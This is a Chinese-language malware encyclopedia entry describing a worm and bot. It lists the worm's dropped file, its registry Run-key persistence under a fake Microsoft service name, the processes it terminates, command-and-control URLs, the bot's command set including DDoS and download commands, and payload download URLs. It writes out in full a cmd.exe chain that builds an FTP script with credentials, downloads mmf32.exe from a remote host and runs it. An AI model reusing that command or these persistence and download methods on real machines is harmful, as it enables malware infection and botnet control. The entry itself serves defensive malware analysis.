病毒大百科

这是一个通过网络传播的蠕虫病毒,该病毒会尝试自更新,并且开启后门接受控制端的控制,结束安全软件,使被感染的机器成为一台网络僵尸.

1.生成文件:
%System%\mmsvc32.exe

2.添加起始项,使病毒开机启动:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft Network Services Controller
mmsvc32.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft Network Services Controller
mmsvc32.exe
3.查找并且关闭以下窗口进程,并且自己注册一个该窗口使其无法开启
DBMWin
TDBMWin

4.删除以下键:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft IIS
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
PayTime
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
lp3mr1sh

5.创建线程运行以下的命令:
cmd.exe /c echo user nnpy@web.cplnn.com >ntsdd.txt
&& echo f729lQjd >>ntsdd.txt
&& echo binary>>ntsdd.txt
&& echo get mmf32.exe >>ntsdd.txt
&& echo quit>>ntsdd.txt
&& ftp -s:ntsdd.txt -n -nnpyf.cplnn.com
&& del ntsdd.txt
&& mmf32.exe

6.运行以下命令,结束安全软件进程:
!proc.kill.* ftp.exe
!proc.kill.* tftp.exe
!proc.kill.* nh.exe
!proc.kill.* nethost.exe
!proc.kill.* syshost.exe
!proc.kill.* ppc.exe
!proc.kill.* paytime.exe
!proc.kill.* lp3mr1sh.exe
!proc.kill.* tibs.exe
!proc.kill.* opera.exe
!proc.kill.* netscape.exe

7.尝试连接以下地址:

http://nnpy.cplnn.com/lipscr2.php
http://dnsf.nnctx.com.ru/ipconf.cfg
http://nnpyev.nnctx.com.ru/wad/nnpy.txt
http://www.ppwex.com/sdata.txt
http://wlog.cplnn.com/wlog.php?action=knock

8.能接收的命令如下:
!HTTP.DOS
!UDP.DDOS
!PROC.KILL
!RUN
!URL.DOWNLOAD
!UPDATE
!AFTP.CONFIG
!URL.SPOOF
!IE.COUNTER

9.尝试下载以下文件:
http://web.cplnn.com/bbot.exe
http://web.cplnn.com/psvc.exe
http://web.cplnn.com/psvc.exe
http://www.gmz41-soft.com/vxupd.exe